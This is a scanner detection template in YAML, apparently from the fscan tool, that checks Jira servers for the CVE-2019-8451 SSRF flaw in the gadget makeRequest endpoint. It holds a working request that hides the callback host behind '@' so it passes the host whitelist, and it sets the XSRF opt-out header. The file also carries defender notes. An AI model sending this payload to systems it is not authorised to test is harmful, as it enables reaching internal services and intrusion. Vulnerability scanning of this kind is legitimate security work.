fscan/WebScan/pocs/jira-ssrf-cve-2019-8451.yml


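# Detection check for CVE-2019-8451: server-side request forgery (SSRF)
# through Jira's gadget proxy endpoint /plugins/servlet/gadgets/makeRequest.
#
# The check is out-of-band. It asks the target to fetch a URL on the
# scanner's callback ("reverse") host and reports a hit only if that host
# records the inbound request.
#
# Reading results:
#   - A hit means the Jira server made an outbound request to a host chosen
#     by the caller, so internal-only services may be reachable through it.
#   - A miss is not proof of a patched instance. Egress filtering or blocked
#     DNS between the target and the callback host also gives no callback.
#
# Defender notes:
#   - In access logs, look for requests to this path whose `url` parameter
#     has an `@` after the instance's own hostname.
#   - Fixed versions are listed in the advisory under detail.links.
#   - Restricting outbound traffic from the Jira host limits the impact.
name: poc-yaml-jira-ssrf-cve-2019-8451
set:
  # Scheme and host of the target itself, reused to build the `url` value.
  originScheme: request.url.scheme
  originHost: request.url.host
  # Fresh callback endpoint on the scanner's reverse platform.
  reverse: newReverse()
  reverseHost: reverse.url.host
  reverseURL: reverse.url.path
rules:
  - method: GET
    # The `url` value has the form <scheme>://<target-host>@<callback-host><path>.
    # The target's own host sits in the userinfo part before `@`, so the
    # real destination is the callback host. A whitelist check that matches
    # on the leading host text would accept it.
    path: >-
      /plugins/servlet/gadgets/makeRequest?url={{originScheme}}://{{originHost}}@{{reverseHost}}{{reverseURL}}
    headers:
      # Atlassian's opt-out value for the XSRF token check.
      # Presumably required for the endpoint to process the request;
      # confirm against the linked advisory.
      X-Atlassian-Token: no-check
    # True only if the callback host sees a request within the wait window.
    # The argument is 5, which is seconds in the xray-style POC format.
    expression: |
      reverse.wait(5)
detail:
  author: jingling(https://github.com/shmilylty)
  links:
    - https://jira.atlassian.com/browse/JRASERVER-69793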